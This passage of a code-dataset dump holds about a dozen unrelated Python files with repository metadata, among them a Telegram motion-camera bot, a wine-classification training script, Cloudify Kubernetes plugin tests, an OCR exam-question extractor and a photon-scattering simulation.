running.\")\n\t else:\n\t \tbot.send_message(chat_id, text=\"Motion detection is running!\")\n\ndef sendLast(bot, update):\n\tlist_of_files = glob.glob('/root/motion/pics/*.jpg') # * means all if need specific format then *.csv\n\tlatest_file = max(list_of_files, key=os.path.getctime)\n\n\tfile_handler = open(latest_file, 'rb')\n\tbot.send_photo(chat_id, photo=file_handler)\n\nsendLast_handler = CommandHandler('sendlast', sendLast)\ndispatcher.add_handler(sendLast_handler)\n\ntakeSnap_handler = CommandHandler('snap', take_snap)\ndispatcher.add_handler(takeSnap_handler)\n\nclean_handler = CommandHandler('cleanpics', clean)\ndispatcher.add_handler(clean_handler)\n\nstartMotion_handler = CommandHandler('startmotion', startMotion)\ndispatcher.add_handler(startMotion_handler)\n\nstopMotion_handler = CommandHandler('stopmotion', stopMotion)\ndispatcher.add_handler(stopMotion_handler)\n\ncheckMotion_handler = CommandHandler('checkmotion', checkMotion)\ndispatcher.add_handler(checkMotion_handler)\n\nif __name__ == '__main__':\n updater.start_polling()\n updater.idle()","repo_name":"ttan/motion-detection-telegram","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"69"}
+{"seq_id":"12673353115","text":"import logging\nimport signal\nimport subprocess\n\nfrom .threads import die\n\n\nlog = logging.getLogger(APP_NAME) # type: ignore\n\n\ndef exec_cmd(cmd):\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n out, err = p.communicate()\n return out, err, p.returncode\n\n\ndef exec_cmd_log(cmd):\n o,e,c = exec_cmd(cmd)\n log.info(f'{cmd} (exit {c}): {o}{e}')\n\n\n# noinspection PyUnusedLocal\nclass SignalHandler:\n\n def __init__(self):\n self.last_signal = 0\n signal.signal(signal.SIGTERM, self.terminate)\n signal.signal(signal.SIGHUP, self.hup)\n\n def hup(self, signum, frame):\n log.warning(f'Signal {signum} received.')\n self.last_signal = signum\n if log.getEffectiveLevel() == logging.INFO:\n log.setLevel(logging.DEBUG)\n elif log.getEffectiveLevel() == logging.DEBUG:\n log.setLevel(logging.INFO)\n\n def terminate(self, signum, frame):\n log.warning(f'Signal {signum} received.')\n self.last_signal = signum\n die()\n","repo_name":"tailucas/pylib","sub_path":"tailucas_pylib/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"33701973380","text":"import ulmo\nimport numpy as np\nfrom datetime import datetime as dt\nfrom matplotlib import pyplot as plt\n\nSITE_ID = '05211000'\nQ_daily_code = '00060:00003'\n\nusgs_gauge = ulmo.usgs.nwis.get_sites(sites=SITE_ID)[SITE_ID]\n\ndaily_request = ulmo.usgs.nwis.get_site_data(SITE_ID, service=\"daily\", period=\"all\")\ndaily_discharge = daily_request[Q_daily_code]['values']\nQ = []\nt = []\nfor row in daily_discharge:\n Q.append( float(row['value']) )\n t.append( dt.strptime(row['datetime'], '%Y-%m-%dT%H:%M:%S') )\n\nQ = np.array(Q)\nt = np.array(t)\n\nnodata_value = float(daily_request.values()[0]['variable']['no_data_value'])\n\nt = t[Q != nodata_value]\nQ = Q[Q != nodata_value]\n\nplt.ion()\nplt.figure(figsize=(18,8))\nplt.plot(t, Q, 'k-', linewidth=2)\nplt.title(usgs_gauge['name'], fontsize=30)\nplt.xlabel('Date', fontsize=20)\n#plt.ylabel('Daily mean discharge [cfs]', fontsize=20)\nplt.ylabel(daily_request.values()[0]['variable']['name'], fontsize=20)\nplt.tight_layout()\n\n","repo_name":"MNiMORPH/Computational-Methods-in-Earth-Sciences","sub_path":"code/FilesData/MississippiGaugeULMO.py","file_name":"MississippiGaugeULMO.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"29471908094","text":"from Deck import Deck\nfrom DisplayBoard import DisplayBoard\nfrom PlaySixHands25 import PlaySixHands25\n\nendgame = False\nwhile endgame == False:\n\n display = DisplayBoard()\n pyramid_poker_hands = Deck(6, 25, 3).deal()\n\n print (\"running PyramidMain\")\n\n for i in range(6):\n print (pyramid_poker_hands[i])\n\n # playsixhands populates best_pyramid_hands and player_win_points\n playsixhands = PlaySixHands25(pyramid_poker_hands)\n\n # put best 6 hands into display.pyramid_hands\n display.pyramid_poker_hands = playsixhands.best_pyramid_hands\n display.player_win_points = playsixhands.player_win_points\n\n # after populating display.attributes, display_6hands\n display.display_6hands()\n\n # now put up playing area\n display.pyr = pyramid_poker_hands[0]\n display.display_next_hand()\n # get player hand\n # populate results of pyramid_hands[0] with player hand\n # now put up playing area","repo_name":"philipblee/Pyramid-Poker-v1","sub_path":"src/PyramidMain.py","file_name":"PyramidMain.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26247719883","text":"def add_time(start, duration,default=\"1\"):\r\n hour_1=[]\r\n minute_1=[]\r\n a=start.split(':')\r\n hour_1.append(int(a[0]))\r\n a=a[1].split(' ')\r\n minute_1.append(int(a[0]))\r\n time_domain=[]\r\n time_domain.append(a[1])\r\n hour_1.append(duration.split(':')[0])\r\n minute_1.append(duration.split(':')[1])\r\n days=int(hour_1[1])//24\r\n hours_left=int(hour_1[1])-24*days\r\n actual_hours=int(hour_1[0])+hours_left\r\n actual_minutes=int(minute_1[0])+int(minute_1[1])\r\n if(actual_minutes>=60):\r\n actual_hours+=1\r\n actual_minutes-=60\r\n if(actual_hours<=12):\r\n if(actual_hours<12 and actual_hours!=0):\r\n new_time=str(actual_hours)+\":\"\r\n if(actual_minutes<10):\r\n new_time+=\"0\"+str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time+=str(actual_minutes)+\" \"+time_domain[0]\r\n elif(actual_hours==0):\r\n actual_hour+=12\r\n new_time=str(actual_hours)+\":\"\r\n if(actual_minutes<10):\r\n new_time+=\"0\"+str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time+=str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time=str(actual_hours)+\":\"\r\n if(actual_minutes<10):\r\n new_time+=\"0\"+str(actual_minutes)\r\n else:\r\n new_time+=str(actual_minutes)\r\n if(time_domain[0]==\"PM\"):\r\n new_time+=\" \"+\"AM\"\r\n else:\r\n new_time+=\" \"+\"PM\"\r\n elif(actual_hours>12 and actual_hours<24):\r\n actual_hours-=12\r\n if(actual_minutes>=10):\r\n new_time=str(actual_hours)+\":\"+str(actual_minutes)+\" \"\r\n else:\r\n new_time=str(actual_hours)+\":\"+\"0\"+str(actual_minutes)+\" \"\r\n if(time_domain[0]==\"PM\"):\r\n new_time+=\"AM\"\r\n else:\r\n new_time+=\"PM\"\r\n else:\r\n actual_hours-=24\r\n if(actual_minutes>=10):\r\n new_time=str(actual_hours)+\":\"+str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time=str(actual_hours)+\":\"+\"0\"+str(actual_minutes)+\" \"+time_domain[0]\r\n if(default!=\"1\"):\r\n days_list=[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"]\r\n day_no=0\r\n for string in days_list:\r\n count=0\r\n if(default.capitalize()==string):\r\n break\r\n else:\r\n day_no+=1\r\n if(time_domain[0]==\"PM\"):\r\n hours_added=int(hour_1[0])+int(hour_1[1])+12\r\n else:\r\n if(hour_1[0]==\"12\"):\r\n hour_1[0]=\"0\"\r\n hours_added=int(hour_1[0])+int(hour_1[1])\r\n minutes_added=int(minute_1[0])+int(minute_1[1])\r\n if(minutes_added>=60):\r\n hours_added+=1\r\n days=hours_added//24\r\n if(default==\"1\"):\r\n if(days>=1):\r\n if(days==1):\r\n new_time+=\" \"+\"(next day)\"\r\n else:\r\n new_time+=\" \"+\"(\"+str(days)+\" \"+\"days\"+\" later)\"\r\n else:\r\n if(days<1):\r\n new_time+=\", \"+string\r\n elif(days==1):\r\n new_time+=\", \"+days_list[(day_no+1)%7].capitalize()+\" \"+\"(next day)\"\r\n else:\r\n new_time+=\", \"+days_list[(day_no+days)%7].capitalize()+\" \"+\"(\"+str(days)+\" days later)\"\r\n \r\n return new_time\r\nnew_time=add_time(\"8:16 PM\",\"466:02\")\r\nprint(new_time)\r\n","repo_name":"Wiz-2/Python_free_code_camp","sub_path":"time_free_1.py","file_name":"time_free_1.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42533770741","text":"class Dice:\n def __init__(self, x):\n self.top = x[0]\n self.front = x[1]\n self.right = x[2]\n self.left = x[3]\n self.back = x[4]\n self.bottom = x[5]\n self.list = x\n\n def N(self):\n self.top, self.front, self.bottom, self.back = (\n self.front,\n self.bottom,\n self.back,\n self.top,\n )\n\n def E(self):\n self.top, self.right, self.bottom, self.left = (\n self.left,\n self.top,\n self.right,\n self.bottom,\n )\n\n def S(self):\n self.top, self.front, self.bottom, self.back = (\n self.back,\n self.top,\n self.front,\n self.bottom,\n )\n\n def W(self):\n self.top, self.right, self.bottom, self.left = (\n self.right,\n self.bottom,\n self.left,\n self.top,\n )\n\n def up_front_to_right(self, top, front):\n if (top, front) in [\n (self.top, self.front),\n (self.front, self.bottom),\n (self.bottom, self.back),\n (self.back, self.top),\n ]:\n return self.right\n elif (top, front) in [\n (self.front, self.top),\n (self.bottom, self.front),\n (self.back, self.bottom),\n (self.top, self.back),\n ]:\n return self.left\n elif (top, front) in [\n (self.left, self.front),\n (self.front, self.right),\n (self.right, self.back),\n (self.back, self.left),\n ]:\n return self.top\n elif (top, front) in [\n (self.front, self.left),\n (self.right, self.front),\n (self.back, self.right),\n (self.left, self.back),\n ]:\n return self.bottom\n elif (top, front) in [\n (self.top, self.left),\n (self.left, self.bottom),\n (self.bottom, self.right),\n (self.right, self.top),\n ]:\n return self.front\n elif (top, front) in [\n (self.left, self.top),\n (self.bottom, self.left),\n (self.right, self.bottom),\n (self.top, self.right),\n ]:\n return self.back\n else:\n return -1\n\n def inverse(self, a):\n if a == self.top:\n return self.bottom\n elif a == self.front:\n return self.back\n elif a == self.right:\n return self.left\n elif a == self.left:\n return self.right\n elif a == self.back:\n return self.front\n elif a == self.front:\n return self.back\n else:\n return -1\n\n\ndef same(dice0, dice1):\n x = dice0.list\n for i in range(6):\n for j in range(i + 1, 6):\n if x[i] != dice0.inverse(x[j]):\n a = dice0.up_front_to_right(x[i], x[j])\n b = dice1.up_front_to_right(x[i], x[j])\n if a != b:\n return False\n return True\n\n\nn = int(input())\nX = []\nfor i in range(n):\n (*x,) = map(int, input().split())\n X.append(Dice(x))\nfor i in range(n):\n for j in range(i + 1, n):\n if same(X[i], X[j]):\n print(\"No\")\n exit()\nprint(\"Yes\")\n","repo_name":"fujihiraryo/aizu-online-judge","sub_path":"ITP1/11D_Dice4.py","file_name":"11D_Dice4.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43635672753","text":"import pycaret.regression as pc\nimport pandas as pd\nfrom sklearn import model_selection\nimport mlflow\nimport sys\n\n\n# Argumentos para a rotina de treinamento\nseed = int(sys.argv[1]) if len(sys.argv) > 1 else 1\nexperiment_name = sys.argv[2] if len(sys.argv) > 2 else 'wine-ml-model'\n\n\n\n## CONFIGURACAO\ntest_size = 0.2\nmodel_name = 'classificacao_vinhos' # evitar espacos, -, e outros caracteres.\nwine_target_col = 'target'\nignore_features = ['target_label']\ncategorical_features = ['type']\n\n\n## LEITURA DOS DADOS DE TREINAMENTO\ndf_wine = pd.read_csv('../Data/dataset_vinhos.csv',sep=';')\nwine_label_map = df_wine[['target', 'target_label']].drop_duplicates()\nprint(df_wine.shape)\ndf_wine.head()\n\n## TREINAMENTO DO MODELO\nY = df_wine[wine_target_col]\nX = df_wine.drop(wine_target_col, axis=1)\nxtrain, xtest, ytrain, ytest = model_selection.train_test_split(X, Y, test_size=test_size, random_state = seed)\ndf_train = xtrain.copy()\ndf_test = xtest.copy()\ndf_train[wine_target_col] = ytrain\ndf_test[wine_target_col] = ytest\n\n# mlflow.set_tracking_uri(\"sqlite:///mlruns.db\")\n\ns = pc.setup(data = df_train, \n target = wine_target_col,\n test_data=df_test,\n categorical_features = categorical_features,\n ignore_features = ignore_features,\n silent = True, \n experiment_name = experiment_name, \n log_experiment = True, \n log_plots = True)\nmodels = ['lr', 'dt', 'rf']\nbestmodel = pc.compare_models(include = models)\n\nclassification_plots = [ 'auc', 'confusion_matrix','error','class_report',\n 'learning','vc','feature',]\nfor plot_type in classification_plots:\n print('=> Aplicando plot ', plot_type)\n try:\n artifact = pc.plot_model(bestmodel, plot=plot_type, save=True)\n mlflow.log_artifact(artifact)\n except:\n print('=> Nao possivel plotar: ', plot_type )\n continue\n\nmlflow.end_run()\n \n","repo_name":"tciodaro/ead_datascience","sub_path":"Code/ml_wine.py","file_name":"ml_wine.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19807477846","text":"import pytest\nfrom unittest import mock\nfrom nesta.packages.cordis.cordis_api import hit_api\nfrom nesta.packages.cordis.cordis_api import extract_fields\nfrom nesta.packages.cordis.cordis_api import get_framework_ids\nfrom nesta.packages.cordis.cordis_api import fetch_data\n\nPKGPATH = 'nesta.packages.cordis.cordis_api.{}'\n\n\n@mock.patch(PKGPATH.format('requests.get'))\ndef test_hit_api(mocked_get):\n dummy_data = 'somedata'\n mocked_get().json.return_value = {'payload': dummy_data}\n kwargs_list = [dict(api='', rcn='r', content_type='ct'),\n dict(api='a', rcn='s', content_type='cta')]\n for kwargs in kwargs_list:\n data = hit_api(**kwargs)\n assert data == dummy_data\n (url,), _kwargs = mocked_get.call_args\n params = _kwargs['params']\n assert url.endswith(kwargs['api'])\n assert params['rcn'] == kwargs['rcn']\n assert params['contenttype'] == kwargs['content_type']\n assert len(params) == 4\n\n\ndef test_extract_fields():\n fields = ['fourth', 'third']\n data = {'first': '1st',\n 'second': '2nd',\n 'third': [{'title': '3rd', 'rcn': '33',\n 'other': 'junk'},\n {'title': '3ard', 'rcn': '33a',\n 'other': 'junka'}],\n 'fourth': '4th'}\n out_data = extract_fields(data, fields)\n assert set(out_data.keys()) == set(fields)\n assert out_data['third'] == [{'title': '3rd', 'rcn': '33'},\n {'title': '3ard', 'rcn': '33a'}]\n assert out_data['fourth'] == data['fourth']\n\n\ndef test_extract_fields_bad_field():\n fields = ['fifth']\n data = {'first': '1st'} \n assert extract_fields(data, fields) == {}\n\n\n@mock.patch(PKGPATH.format('pd'))\ndef test_get_framework_ids(mocked_pd):\n framework = 'h2229'\n assert type(get_framework_ids(framework)) is list\n (url,), kwargs = mocked_pd.read_csv.call_args\n assert framework in url\n\n\n@mock.patch(PKGPATH.format('hit_api'))\n@mock.patch(PKGPATH.format('extract_fields'))\ndef test_fetch_data(mocked_extract, mocked_api):\n response = fetch_data(None)\n assert type(response) is tuple\n assert len(response) == 4\n","repo_name":"nestauk/old_nesta_daps","sub_path":"nesta/packages/cordis/tests/test_get_cordis_api.py","file_name":"test_get_cordis_api.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"3070445730","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n# Built-in Imports\nimport testtools\nimport fabric\nimport yaml\n\n# Third Party Imports\n\n# Cloudify Imports is imported and used in operations\nfrom kube_plugin import remote_tasks\nfrom mock import patch, mock_open\n# from cloudify import manager\nfrom cloudify.state import current_ctx\nfrom cloudify.mocks import MockContext\nfrom cloudify.mocks import MockCloudifyContext\n# from cloudify.mocks import MockNodeContext\n# from cloudify.mocks import MockNodeInstanceContext\n# from cloudify.mocks import MockRelationshipContext\n# from cloudify.mocks import MockRelationshipSubjectContext\n# from cloudify.exceptions import NonRecoverableError\n\n_test_open = mock_open()\n\n\nclass rc():\n\n def __init__(self, retcode=0, stderr='this is some output'):\n self.return_code = retcode\n self.stderr = stderr\n\n\nclass TestKubeTasks(testtools.TestCase):\n\n def relationship_context(self):\n\n target_node_context = MockContext({\n 'node': MockContext({\n 'properties': {\n 'ip': \"1.1.1.1\",\n 'master_port': '33'\n }\n }),\n 'instance': MockContext({\n 'runtime_properties': {}\n })\n })\n\n source_node_context = MockContext({\n 'instance': MockContext({\n 'runtime_properties': {}\n })\n })\n\n return MockCloudifyContext(\n node_id=\"test\",\n source=source_node_context,\n target=target_node_context)\n\n def test_connect_local(self):\n \"\"\" This tests that connecting to a master node in local mode works \"\"\"\n\n ctx = self.relationship_context()\n ctx._local = True\n current_ctx.set(ctx=ctx)\n\n remote_tasks.connect_master()\n self.assertIn('master_ip', ctx.source.instance.runtime_properties)\n self.assertEquals(ctx.source.instance.runtime_properties[\n 'master_ip'], \"1.1.1.1\")\n\n def test_connect_remote(self):\n \"\"\" This tests that connecting to a master node that cloudify isn't\n managing\n \"\"\"\n ctx = self.relationship_context()\n ctx.target.node.type = \"cloudify.kubernetes.Master\"\n current_ctx.set(ctx=ctx)\n remote_tasks.connect_master()\n self.assertEquals(ctx.source.instance.runtime_properties[\n 'master_ip'], \"1.1.1.1\")\n self.assertEquals(\n ctx.source.instance.runtime_properties['master_port'], \"33\")\n\n def test_connect_proxy(self):\n \"\"\" This tests that connecting to a master node that cloudify\n isn't managing\n \"\"\"\n ctx = self.relationship_context()\n ctx.target.node.type = \"cloudify.nodes.DeploymentProxy\"\n ctx.target.instance.runtime_properties['kubernetes_info'] = {}\n ctx.target.instance.runtime_properties[\n 'kubernetes_info']['url'] = 'http://33.33.33.33:1234'\n current_ctx.set(ctx=ctx)\n remote_tasks.connect_master(\n kubernetes_url_prop='[\"kubernetes_info\"][\"url\"]')\n\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.open', _test_open)\n def test_kube_run_with_config(self, mock_put, mock_run):\n\n ctx = MockCloudifyContext(node_id='test',\n properties={\n 'config': {'key1': {'key1.1': 'val1.1'}},\n 'config_files': None,\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename': '/root/.ssh/agent_key',\n },\n runtime_properties={\n 'master_ip': '1.1.1.1',\n }\n )\n current_ctx.set(ctx=ctx)\n mock_run.return_value = rc()\n remote_tasks.kube_run_expose()\n self.assertEquals(_test_open.call_count, 1)\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n config_yaml = '{ \"key1\": { \"key1.1\": \"val1.1\" }}'\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n self.assertEquals(mock_put.call_count, 1)\n self.assertEquals(mock_run.call_count, 1)\n\n def test_kube_run_with_config_files_nosubs(self):\n\n @patch('kube_plugin.remote_tasks.open', _test_open)\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.yaml.load', spec=yaml.load)\n def inner(self, mock_yaml, mock_put, mock_run):\n\n ctx = MockCloudifyContext(\n node_id='test',\n properties={'config': None,\n 'config_files': [{'file': 'test.yaml'}],\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename': '/root/.ssh/agent_key', },\n runtime_properties={'master_ip': '1.1.1.1', })\n\n _test_open.reset_mock()\n\n def dl(self):\n return \"nopath\"\n ctx.download_resource = dl\n\n mock_run.return_value = rc()\n mock_yaml.return_value = {\n 'kind': 'pod', 'metadata': {\n 'name': 'service'}}\n\n current_ctx.set(ctx=ctx)\n remote_tasks.kube_run_expose()\n\n # reads then writes\n self.assertEquals(_test_open.call_count, 2)\n self.assertEquals(mock_put.call_count, 1)\n self.assertEquals(mock_run.call_count, 1)\n\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n return yamlout\n\n yamlout = inner(self)\n config_yaml = \"{'kind':'pod','metadata':{'name':'service'}}\"\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n\n def test_kube_run_with_config_files_nosubs_multi(self):\n\n @patch('kube_plugin.remote_tasks.open', _test_open)\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.yaml.load', spec=yaml.load)\n def inner(self, mock_yaml, mock_put, mock_run):\n\n ctx = MockCloudifyContext(node_id='test',\n properties={\n 'config': None,\n 'config_files': [{'file': 'test.yaml'},\n {'file': 'test2.yaml'}\n ],\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename':\n '/root/.ssh/agent_key',\n },\n runtime_properties={\n 'master_ip': '1.1.1.1',\n }\n )\n\n _test_open.reset_mock()\n\n def dl(self):\n return \"nopath\"\n ctx.download_resource = dl\n\n mock_run.return_value = rc()\n mock_yaml.return_value = {\n 'kind': 'pod', 'metadata': {\n 'name': 'service'}}\n\n current_ctx.set(ctx=ctx)\n remote_tasks.kube_run_expose()\n\n # reads then writes\n self.assertEquals(_test_open.call_count, 4)\n self.assertEquals(mock_put.call_count, 2)\n self.assertEquals(mock_run.call_count, 2)\n\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n return yamlout\n\n yamlout = inner(self)\n config_yaml = \"{'kind':'pod','metadata':{'name':'service'}}\"\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n\n def test_kube_run_with_config_file_subs(self):\n\n @patch('kube_plugin.remote_tasks.open', _test_open)\n @patch('kube_plugin.remote_tasks.manager.get_rest_client')\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.yaml.load', spec=yaml.load)\n def inner(self, mock_yaml, mock_put, mock_run, rest_open):\n\n # simple, runtime prop, and context prop\n overrides = [\n \"['key1']='sub1'\",\n \"['key2']='@{test,master_ip}'\",\n \"['key3']='%{instance.id}'\"\n ]\n ctx = MockCloudifyContext(node_id='test',\n properties={\n 'config': None,\n 'config_files': [{'file': 'test.yaml',\n 'overrides': overrides\n }],\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename':\n '/root/.ssh/agent_key',\n },\n runtime_properties={\n 'master_ip': '1.1.1.1',\n }\n )\n\n class mock_rest_client():\n\n class _instances():\n\n def list(self, **kwargs):\n return [\n ctx._instance\n ]\n node_instances = _instances()\n rest_open.return_value = mock_rest_client()\n\n _test_open.reset_mock()\n\n def dl(self):\n return \"nopath\"\n ctx.download_resource = dl\n\n mock_run.return_value = rc()\n mock_yaml.return_value = {\n 'kind': 'pod',\n 'metadata': {\n 'name': 'service'},\n 'key1': 'val1',\n 'key2': 'val2'}\n\n current_ctx.set(ctx=ctx)\n remote_tasks.kube_run_expose()\n\n # reads then writes\n self.assertEquals(_test_open.call_count, 2)\n self.assertEquals(mock_put.call_count, 1)\n self.assertEquals(mock_run.call_count, 1)\n\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n return yamlout\n\n yamlout = inner(self)\n config_yaml = \"{'kind':'pod','metadata':{'name':'service'},\\\n 'key1':'sub1','key2':'1.1.1.1','key3':'test'}\"\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n","repo_name":"gokulpch/cloudify-kubernetes-plugin","sub_path":"kube_plugin/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":11827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"4588028132","text":"import os, io\nfrom google.cloud import vision\nfrom google.cloud.vision import types\nfrom PIL import Image\nfrom pdf2image import convert_from_path\nimport sys\nimport json\nimport db\n\npth2file = input(\"Enter the path to the pdf file you would like to analyze: \")\npth2json = input(\"Enter the path to the json file for the ServiceAccountToken: \")\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = pth2json\nclient = vision.ImageAnnotatorClient()\n\nlast = 1\npages = convert_from_path(pth2file, 500)\nfor i in range(1, len(pages)+1):\n fn = \"page_\" + str(i) + \".png\"\n pages[i-1].save(fn)\nquestions = [[0,0,0,0]]\npgs = [0]\nlasttext = \"\"\nquestiontexts = []\nfor i in range(1, len(pages)+1):\n pth = \"page_\" + str(i) + \".png\" \n with io.open(pth, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n im = Image.open(pth)\n width, height = im.size\n response = client.text_detection(image=image)\n texts = response.text_annotations\n for text in texts:\n req1 = str(last)+\".\"\n req2 = str(last)+\")\"\n req3 = str(last)\n miny = 1000000000000000000000000000000000000000\n if(str(text.description) == req1 or str(text.description) == req2 or str(text.description) == req3):\n pgs.append(i)\n for j in text.bounding_poly.vertices:\n miny = min(miny, j.y)\n miny -= 50\n questions.append([0, miny, width, height])\n if pgs[len(pgs)-1] == pgs[len(pgs)-2]:\n questions[last-1][2] = width\n questions[last-1][3] = miny\n last += 1\n\nfor i in range(1, len(questions)):\n pth = \"page_\" + str(pgs[i]) + \".png\" \n image = Image.open(pth)\n cropped = image.crop((questions[i][0], questions[i][1], questions[i][2], questions[i][3]))\n fname = \"question\" + str(i) + \".png\"\n cropped.save(fname)\n\nos.mkdir('other')\ndata = {}\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\nfor i in range(1, len(questions)):\n pth = \"question\"+str(i)+\".png\"\n with io.open(pth, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n im = Image.open(pth)\n width, height = im.size\n response = client.text_detection(image=image)\n texts = response.text_annotations\n indlast = 1\n alphalast = 0\n options = [[0,0,0,0]]\n for text in texts:\n req = \"(\"+ str(alphabet[alphalast])+\")\"\n miny = 1000000000000000000000000000000000000000\n if text.description == req:\n for j in text.bounding_poly.vertices:\n miny = min(miny, j.y)\n miny -= 50 \n options.append([0, miny, width, height])\n options[indlast-1][2] = width\n options[indlast-1][3] = miny\n indlast +=1\n alphalast += 1\n q = \"\"\n optiontxt = []\n for j in range(len(options)):\n image = Image.open(pth)\n cropped = image.crop((options[j][0], options[j][1], options[j][2], options[j][3]))\n fname = \"other/question\" + str(i) + \"option\" + str(j) + \".png\"\n cropped.save(fname)\n with io.open(fname, 'rb') as image_file:\n content = image_file.read()\n image2 = vision.types.Image(content=content)\n response = client.text_detection(image=image2)\n texts2 = response.text_annotations\n if j == 0:\n q = texts2[0].description\n else:\n temp = texts2[0].description\n tofnd = \"(\" + str(alphabet[j-1]) + \")\"\n fin2 = temp.replace(tofnd, \"\")\n fin = fin2.replace(\"\\n\", \"\")\n optiontxt.append(fin)\n temp = {}\n temp[\"question\"] = q\n temp[\"options\"] = optiontxt\n data[i] = temp\n db.addquestion(str(q))\n for j in optiontxt:\n db.addoptions(i, str(j))\n\nwith open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n","repo_name":"knightron0/exam-analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34224454837","text":"from Objective import Objective\nfrom Medium import Medium\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nfrom itertools import compress\nimport plotly\nimport utils\n\nmpl.use('Qt5Agg')\n\n# Scattering coefficient\n# in um^-1\nmu_s = 0.01070\n\n# Absorption coefficient\nmu_a = 0.0002\n\n# Refractive indices\n# in tissue\nn_i = 1.4\n\n# in air\nn_e = 1\n\n# Anisotropy factor\n# in white matter\ng = .94\n\nsample_depth = 1000\nfocus_depth = 170\nworking_distance = 5940\nNA = 0.54\nfov = np.linspace(0, 0, 1)\n\ndistance_to_sample = working_distance + focus_depth\n\nnum_photons = 5000\n\nmedium_shape = np.array([float('inf'), float('inf'), sample_depth])\nmedium = Medium(medium_shape, mu_s, mu_a, n_i, n_e, g)\n\n# xx, yy = np.meshgrid(range(-100, 100), range(-100, 100), sparse=True)\n# z_1 = xx * 0 + yy * 0\n# z_2 = xx * 0 + yy * 0 + 260\n\nobjective = Objective(NA, working_distance, sample_depth)\n\nphotons = utils.fov_sim(medium, fov, num_photons, focus_depth, omit_bottom=True)\n\nfig = utils.plot_photons(photons[0][0], objective, show_aperture=True)\nplotly.offline.plot(fig, filename='file_1.html')\n\nfig = utils.plot_photon_path(photons[0][0][0])\nplotly.offline.plot(fig, filename='file.html')\n\nacceptance_matrix = utils.calc_acceptance_matrix(photons, objective)\nfig = utils.plot_fov_heatmap(acceptance_matrix, fov)\nplotly.offline.plot(fig, filename='file2.html')\n\n# sns.jointplot(x=positions[:, 0], y=positions[:, 1])\n# sns.jointplot(x=positions[:, 0], y=positions[:, 2])\n#\n\n#\n# 